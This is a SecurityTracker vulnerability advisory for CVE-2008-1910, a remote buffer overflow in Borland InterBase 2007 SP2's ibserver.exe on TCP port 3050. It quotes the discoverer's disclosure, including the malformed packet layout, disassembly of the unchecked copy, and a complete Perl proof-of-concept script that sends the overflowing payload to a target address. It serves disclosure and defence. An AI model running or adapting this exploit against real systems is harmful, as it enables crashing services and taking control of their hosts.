Borland InterBase Buffer Overflow in 'ibserver.exe' Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1019834 |
|
SecurityTracker URL: http://securitytracker.com/id/1019834
|
|
CVE Reference:
CVE-2008-1910
(Links to External Site)
|
Updated: Apr 24 2008
|
Original Entry Date: Apr 11 2008
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2007 SP2
|
Description:
A vulnerability was reported in InterBase. A remote user can execute arbitrary code on the target system.
A remote user can send specially crafted data to TCP port 3050 trigger a buffer overflow in 'ibserver.exe' and execute arbitrary code on the target system. The code will run with the privileges of the target service.
Liu Zhen Hua reported this vulnerability.
|
Impact:
A remote user can execute arbitrary code on the target system.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.codegear.com/downloads/regusers/interbase (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS: Linux (Any), UNIX (Solaris - SunOS), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: Borland InterBase 2007
|
Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC
Affected Software:
Borland InterBase 2007 Service Pack 2.
ibserver.exe version 8.0.0.123
Severity:
High
Summary:
There exists a vulnerability in Borland InterBase 2007.
The attacker who successfully exploited this vulnerability can gain control of vulnerable systems.
Details:
There exists a buffer overflow vulnerability in "ibserver.exe" which is contained in Borland InterBase 2007 Service Pack 2.
The vulnerable opcode is 0x52. When sending some malformed data as below to TCP port 3050,
| 4bytes Opcode | "\x00\x00\x00\x52\"
| 4bytes Unknow | "\xFF\xFF\xFF\xFF"
| 4bytes Length1 | "\x00\x00\x03\xE8"
| Data1 | "\x41"x1000
| 4bytes Length2 | "\x00\x00\x00\x10"
| Data2 | "\x42"x16
InterBase ibserver service will terminate and reboot. It results in the return address be overwritten as following.
.text:0041460F mov ecx, [ebp+arg_4]
.text:00414612 xor edx, edx
.text:00414614 mov dx, [ecx]
.text:00414617 push edx
.text:00414618 mov eax, [ebp+arg_4]
.text:0041461B mov ecx, [eax+4]
.text:0041461E push ecx // | Data1 | "\x41"x1000
.text:0041461F mov edx, [ebp+arg_0]
.text:00414622 push edx
.text:00414623 mov eax, [ebp+arg_0]
.text:00414626 mov ecx, [eax+4]
.text:00414629 call dword ptr [ecx+8] //call function 411136 (strcpy)
.text:00411136 push ebp
.text:00411137 mov ebp, esp
.text:00411139 push ecx
.text:0041113A push esi
.text:0041113B push edi
......
.text:00411157 mov ecx, [ebp+loop_count]
.text:0041115A mov eax, [ebp+recv_info_struct]
.text:0041115D mov esi, [eax+0Ch]
.text:00411160 mov edi, [ebp+arg_4]
.text:00411163 mov edx, ecx
.text:00411165 shr ecx, 2
.text:00411168 rep movsd
//copy data 1000 bytes 0x41,without boundary check
//Buffer overflow take place
.text:0041116A mov ecx, edx
.text:0041116C and ecx, 3
.text:0041116F rep movsb
:stack
FrameEBP RetEIP Syms Symbol
013AF5EC 41414141 N ibserver!.text + 00026F68
How to Reproduce:
Run the POC as below:
poc.pl victimAddress
Discovered by:
Liu Zhen Hua
###############################################################################################################
# POC.pl #
###############################################################################################################
#!/usr/bin/perl -w
#Author: Liu Zhen Hua <alau [at] 163.com>
use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip\n";
}
if ($#ARGV < 0) {
usage();
exit();
}
my $victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$host,
PeerPort=>3050);
my $pad0 = "\x41"x1000; #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16;
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x10".$pad5;
print $victim $exploit ;
print " + Malicious request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;
|
|
